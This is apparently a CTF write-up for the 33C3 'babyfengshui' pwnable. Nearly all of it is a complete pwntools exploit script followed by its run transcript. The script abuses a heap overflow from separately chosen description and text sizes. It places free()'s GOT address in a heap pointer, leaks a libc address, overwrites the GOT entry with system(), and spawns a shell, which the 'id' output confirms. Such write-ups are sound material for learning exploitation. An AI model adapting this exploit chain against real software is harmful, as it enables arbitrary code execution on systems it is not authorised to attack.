
33C3 CTF - babyfengshui

pwn3r_45 2018. 12. 14. 18:53

Category : pwnable


Summary : heap overflow




Exploit

#!/usr/bin/python

from pwn import *

def cmd_add(alloc_size, input_size, name, data):
    """Drive menu action 0 (add) of the challenge binary.

    Sends, in the order the menu prompts for them: the description size
    *alloc_size*, the entry *name*, the text length *input_size* and the
    text *data* itself.

    *alloc_size* and *input_size* are sent as two independent numbers; the
    binary does not appear to tie the text length to the description size
    (the script below relies on that), so the caller picks both.  On the
    binary's side the defensive fix is to reject a text length larger than
    the description it is stored in.
    """
    # (prompt fragment to wait for, reply to send), in menu order
    dialogue = [
        ('Action', str(0)),
        ('size of description: ', str(alloc_size)),
        ('name: ', name),
        ('text length: ', str(input_size)),
        ('text: ', data),
    ]
    for prompt, reply in dialogue:
        ru(prompt)
        sl(reply)

def cmd_del(idx):
    """Drive menu action 1 (delete) for entry number *idx*."""
    replies = [('Action', '1'), ('index: ', str(idx))]
    for prompt, reply in replies:
        ru(prompt)
        sl(reply)


def cmd_show(idx):
    """Drive menu action 2 (show) for entry *idx*.

    Returns the ``(name, description)`` pair the binary prints after its
    'name: ' and 'description: ' prompts, each read as one line with the
    line ending dropped (``recvline(False)``).
    """
    ru('Action')
    sl('2')
    ru('index: ')
    sl(str(idx))
    fields = []
    for prompt in ('name: ', 'description: '):
        ru(prompt)
        fields.append(rl(False))
    shown_name, shown_desc = fields
    return shown_name, shown_desc


def cmd_update(idx, input_size, data):
    """Drive menu action 3 (update): replace the text of entry *idx*.

    Sends the new text length *input_size* and then *data*; as in
    ``cmd_add`` the length is chosen by the caller, not derived from the
    data.
    """
    dialogue = [
        ('Action', '3'),
        ('index: ', str(idx)),
        ('text length: ', str(input_size)),
        ('text: ', data),
    ]
    for prompt, reply in dialogue:
        ru(prompt)
        sl(reply)

# Address of the GOT slot for free() in the challenge binary, as given in
# the writeup (a non-PIE 32-bit binary, judging by the 0x0804xxxx value).
free_got = 0x0804b010

s = process('./babyfengshui')
# Short aliases the cmd_* helpers above look up at call time.
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

# Set up the heap: four entries (description size == text length), then
# delete the first and the third.
entries = [
    (0x20, 'name', 'desc'),
    (0x10, 'overwriteme', 'desc2'),
    (0x20, 'name3', 'desc3'),
    (0x100, 'name4', 'sh'),
]
for size, entry_name, text in entries:
    cmd_add(size, size, entry_name, text)
for idx in (0, 2):
    cmd_del(idx)

# The "heap overflow" of the summary: a text longer than the 0x80-byte
# description it is stored in.  The binary takes the text length and the
# description size as independent numbers, so the extra bytes are written
# past the description.  The defensive fix is on the binary's side -- bound
# the text length by the description size.
pay = ''.join([
    'a' * 0x80,
    p32(0) + p32(0x19),
    'a' * 0x10,
    p32(0) + p32(0x89),
    p32(free_got),
    'overwriteok',
])
cmd_add(0x80, len(pay), 'name', pay)

# The first 4 bytes of what entry 1 now shows as its description are taken
# as a libc address.  Both offsets are specific to the libc build the
# writeup was solved against and will differ elsewhere.
_, leak = cmd_show(1)
libc_base = u32(leak[0:4]) - 0x70750
libc_system = libc_base + 0x3a940

# Write the 4-byte system address as entry 1's text, delete entry 3
# (whose text is 'sh'), then hand the session to the user -- the
# transcript below shows the resulting shell.
cmd_update(1, 4, p32(libc_system))
cmd_del(3)

s.interactive()
s.close()


$ python ex.py 
[+] Starting local process './babyfengshui': pid 128654
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)